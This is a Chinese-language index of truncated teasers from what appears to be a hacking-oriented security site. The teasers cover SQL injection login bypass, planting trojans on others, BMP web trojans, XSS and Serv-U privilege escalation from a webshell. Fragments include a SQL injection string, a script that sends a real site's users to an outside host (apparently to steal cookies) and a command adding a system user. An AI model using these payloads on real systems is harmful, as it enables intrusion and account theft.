随着网络的普及，网络安全也越来越被人们所重视。今天就给大家介绍一个很少为人重视的案例。希望大家提高安全意识！ 大家都应该知道，现在很多的猫都带有自动拨号功能，我们可...

软件作者：pt007[at]vip.sina.com版权所有,转载请注明版权 信息来源：邪恶八进制信息安全团队（www.eviloctal.com） 一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统，很多大型...

如果你的查询语句是select * from admin where username=''''""'''' and password=''''""''''" 那么，如果我的用户名是：1'''' or ''''1''''=''''1 那么，你的查询语句将会变成： select * from admin where username=''''...

怎样让别人中木马? 这是网友们问得最多的问题，零零散散的回答也有一些了，但总是很少，于是小鱼儿决定搜集众人的智慧和在下的一点经验写一篇专题文章。希望大家多多发言，完善...

首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下.何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件...

一、跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn MyTest: 先在他的论谈上传两张图， 图一的内容是: scriptdocument.location='http://linzi.cnbct.org/coo...

前言 前段时间在网上看到一个网址，好奇之下进去看了看。胜利的条件是你录入一个串，让其调用prompt(1) 。发现里面有好多想不到的东西，今天终于悠闲了来这里说说XSS。 XSS 原理 跨...

有时候我们在获得WebShell后很高兴地用Serv-U的本地权限提升漏洞来实现完全控制肉鸡的目的，但总会出错。我们在WebShell输入的命令一般是这样的： D:\WEB\su.exe“netuser11/add” 很多情况下不...